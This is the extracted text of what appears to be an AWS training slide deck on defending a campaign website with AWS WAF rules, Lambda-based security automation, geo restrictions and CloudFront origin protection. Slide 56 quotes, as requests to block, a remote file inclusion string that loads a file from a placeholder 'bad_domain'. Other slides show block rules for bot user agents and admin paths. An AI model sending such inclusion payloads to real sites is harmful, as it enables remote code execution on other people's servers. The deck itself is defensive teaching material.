  • 18. Unique aspects of AWS WAF • Customizable rules created by customers to avoid false positives • Full-feature API: This is a DevOps WAF that can be deployed inline with new websites and applications • Integrated with AWS: CloudFront, CloudWatch • Integrated with partners: Alert Logic, TrendMicro, Imperva • Pay as you go pricing
  • 19. AWS WAF components 1. Conditions: • IP match • String match • SQL injection match • Cross-site scripting match • Size constraints 2. Rules: Precedence / rule / action 3. Web access control lists (web ACL) 4. AWS resource: CloudFront distribution 5. Reporting: Real-time metrics, sampled web requests
  • 20. • Conditions are lists of criteria that identify components of web requests • Conditions include matching on the following: • IP address i.e., /8, /16, /24, /32 • Strings, i.e., URI, query string, header, etc. • SQL injection, i.e., looks for valid SQL statements • Conditions are logically disjoined • Conditions are reusable elements • Filter targets and transformations • Positional constraints (contains, exact,…) AWS WAF: Conditions
  • 21. AWS WAF: Rules • Rules are sets of conditions with a predetermined action • Available actions are: • Block • Allow • Count • Rules can logically join conditions • Rules are reusable elements
  • 22. AWS WAF: Web ACL • Web ACLs contain a set of conditions, rules, and actions • Web ACLs are applied to one or many CloudFront distributions • Web ACLs show you real-time metrics and sampled web requests for each rule • Web ACLs evaluate rules in order • Whitelisting or blacklisting behavior
  • 23. AWS WAF: Resource Web ACLs are applied to CloudFront distributions • Rule reusability: use one web ACL for all distributions • Flexibility: use individual web ACL for each distribution
  • 24. AWS WAF: Reporting and logs • Real-time metrics (CloudWatch): • Blocked web requests • Allowed web requests • Counted web requests • Adjustments to rules in response to real-time metrics and sampled requests • Time period can be adjusted by sliding graph endpoints or via filters.
  • 25. AWS WAF request process
  • 26. Example: Whitelisting good users Verify that a valid referrer is present Host: www.example.com User-Agent: Mozilla/5.0 (Macintosh; … Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referrer: http://www.example.com/ Connection: keep-alive AWS WAF RAW request headers CloudFront Check: Header “Referrer” Match Type: Contains Match: “example.com” Action: ALLOW Rule String match condition Good users
  • 27. Example: Blacklisting bad bots Block unwanted user agent headers and use transforms to stop evasion: Host: www.example.com User-Agent: bAdBoT Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referrer: http://www.InTeRnEtkItTiEs.com/ Connection: keep-alive AWS WAF RAW request headers CloudFront Check: Header “User-Agent” Transform: To lower Match Type: Contains Match: “badbot” Action: BLOCK Rule String match condition Scraper bot
  • 28. Bob runs for city council and is worried
  • 29. Task 1: Protect Bob’s campaign website from threats
  • 30.
  • 31. Chapter 2: AWS WAF security automation
  • 32. The story so far We have a website (or web application) operational✓ Able to monitor it and analyze logs✓ Able to filter basic common attack vectors✓
  • 33. Bob won the election and is busy improving the lives of his constituency
  • 34. The threat landscape is evolving Dynamically reconfigure the WAF rules and conditions to better adapt to changing threats • React to changing sources of malicious traffic • React to changing signatures of malicious requests • Leverage reputation lists and keep them updated • Predictive analysis
  • 35. Integration with DevOps  Analyzer AWS WAF Logs Threat analysis Rule updater Notification Security engineer Web serverGood users Bad folks
  • 36. Integration with DevOps  Scheduled Threat database Scheduler AWS WAF Web serverGood users Bad folks Rule updater
  • 37. Building blocks Amazon S3 AWS Lambda Amazon CloudWatch AWS CloudFormation Amazon API Gateway AWS WAF Amazon CloudFront Amazon Machine Learning Amazon Kinesis Amazon SNS Logs 1. Analyzer 2. Rule updater Metrics & Alarms Pack solution HTTP/S endpointRule engine Entry point Advanced analysis Log streamingAlerts
  • 38. Security automation examples HTTP floods Scanners and probes IP reputation lists Bots and scrapers
  • 39. Security automation examples HTTP floods Scanners and probes IP reputation lists Bots and scrapers
  • 40. Log parser HTTP flood Scanner & probe protection new access log files a Amazon CloudFront Amazon S3 Bucket AWS Lambda Log Parser AWS WAF b c
  • 41. Security automation examples HTTP floods Scanners and probes IP reputation lists Bots and scrapers
  • 42. IP reputation lists known-attacker protection hourly a Amazon CloudFront AWS Lambda IP Lists Parser AWS WAF b c Amazon CloudWatch event Third-party IP reputation lists
  • 43. Security automation examples HTTP floods Scanners and probes IP reputation lists Bots and scrapers
  • 44. Bots and scrapers bad bot scraper protection Amazon CloudFront AWS Lambda Access Handler AWS WAF b c d web application resources <a href="/v1/name/" style="display: none" aria-hidden="true">honeypot link</a> a
  • 45. Bob runs for state senate and is very worried
  • 46. Task 2: Protect Bob’s campaign website from changing threats
  • 47. AWS WAF Good users Hands-On: HTTP/S protection Bad folks Runs for state senate
  • 48.
  • 49. Chapter 3: Additional security controls
  • 50. The story so far We have a website (or web application) operational✓ Able to monitor it and analyze logs✓ Able to filter basic common attack vectors✓ Able to automate and react to dynamic security conditions ✓
  • 51. Bob won the election and is busy improving the lives of his constituency
  • 52. Where do we go from here? What can we do to further improve security? Restrict content to the geography of our audience✓ Securing our specific application profile✓ Prevent CDN bypass✓ Comprehensive look at web app security – OWASP Top 10✓
  • 53. OWASP top 10 (2013) Represents a broad consensus about what the most critical web application security flaws are A1 Injection A2 Broken auth. And session mgmt. A3 Cross-site scripting (xss) A4 Insecure direct object references A5 Security misconfiguration A6 Sensitive data exposure A7 Missing function level access ctrl. A8 Cross-site request forgery (csrf) A9 Using components with known vulnerabilities A10 Unvalidated redirects and forwards
  • 54. OWASP top 10 (2013) Not all OWASP top 10 flaws can be addressed with a WAF Security flaws that AWS WAF can help mitigate to varying degrees: A1 Injection (E.G. Sql injection) A2 Broken auth. And session mgmt. A3 Cross-site scripting (xss) A4 Insecure direct object references A5 Security misconfiguration A6 Sensitive data exposure A7 Missing function level access ctrl. A8 Cross-site request forgery (csrf) A9 Using components with known vulnerabilities A10 Unvalidated redirects and forwards ✓ ✓ ✓ ✓ ✓
  • 55. Securing our specific application profile Know your application in-depth, even is it’s a open source/commercial off-the-shelf product What services/URL paths does it expose to the web? Keep them all up-to-date, and install security patches timely Keep exposure footprint low 1 3 Know the packages, libraries, components your application is leveraging Additional features and services they exposed 2
  • 56. Limit access to nonpublic features Does your website/application have a control/admin interface? • Whitelist access to only known IP sources At risk for vulnerable platform runtime/middleware? • Block suspect requests by string matching Does your app or runtime server-side include web accessible components? • Block access to such component URLs via string matching Wordpress Admin: http://<my_domain>/wp-admin/ http://<my_domain>/?_SERVER[DOCUMENT_ROOT]=http://<bad_domain>/bad.txt? http://<your_joomla_cms>/components/com_mojo/wp-comments-post.php
  • 57. Example: Using string match sets { "ByteMatchSet": { "ByteMatchSetId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", "Name": "my-string-filters", "ByteMatchTuples": [ { "TargetString": "/wp-admin", "PositionalConstraint": "STARTS_WITH", "TextTransformation": ”URL_DECODE", "FieldToMatch": { "Type": "URI" } } ] } }
  • 58. CloudFront geo restrictions Geo restrictions or geoblocking: prevent users in specific geographic locations from accessing content • Amazon CloudFront supports geo restrictions at the country level • Whitelisting or blacklisting approach • Most commonly used to limit access to content to locations where a distribution right exists • Security perspective: limit exposure footprint and potentially increase cost of launching attacks against your website
  • 59. CloudFront geo restrictions in depth • CloudFront distribution level restrictions • CloudFront uses a third-party GeoIP database • 99.8% accurate source IP geolocation • Based on distribution restrictions, edge location decides to allow or block • Blocked requests return a 403 (Forbidden) status code
  • 60. Prevent CDN bypassing Deploying a WAF filtering at the edge is effective ... as long as bad folks can’t bypass your CloudFront distribution • Configure origins to only accept traffic from the CloudFront edge locations • Set up S3 origins to use an origin access identity (OAI) and configure S3 bucket policies to accept GetObject API calls from the OAI principal • Configure firewall rules on custom origins to accept traffic only from CloudFront IP ranges
  • 61. Getting the AWS IP ranges AWS publishes its current IP address ranges in JSON format: • Both IPV4 and IPV6 ranges are published • Filter the service attribute by the CLOUDFRONT value • Track changes in list via the createDate attribute • Subscribe to the following Amazon SNS topic to receive notifications when AWS IP address ranges change: https://ip-ranges.amazonaws.com/ip-ranges.json Topic ARN: arn:aws:sns:us-east-1:806199016981:AmazonIpSpaceChanged
  • 62. Automatic VPC security group updates Blog post: How to Automatically Update Your Security Groups for Amazon CloudFront and AWS WAF by Using AWS Lambda http://amzn.to/2fj4Q8e Create a VPC security group Use tagging to designate they can be autoupdated Create the AWS Lambda function Using the provided code and execution role 1 3 Create an IAM policy and AWS Lambda execution role Grant the function permission to change the security group 2 Create the function trigger Using the Amazon SNS AmazonIpSpaceChanges topic 4
  • 63. Bob runs for congress and is extremely worried
  • 64. Task 3: Add additional security controls to bob’s campaign website
  • 65.
  • 67. Useful resources AWS WAF Security Automations https://aws.amazon.com/answers/security/aws-waf-security-automations/ AWS Best Practices for DDOS Resiliency https://d0.awsstatic.com/whitepapers/Security/DDoS_White_Paper.pdf
  • 69. Related sessions CTD204 – Offload Security Heavy-lifting to the AWS Edge - Nihar Bihani, Sr. Manager, AWS Product Management SAC304 - Predictive Security: Using Big Data to Fortify Your Defenses - Michael Capicotto and Matt Nowina, AWS Solutions Architects SAC316 - Security Automation: Spend Less Time Securing Your Applications - Venkat Vijayaraghavan, AWS Sr. Product Manager; Nathan Dye, AWS Software Development Manager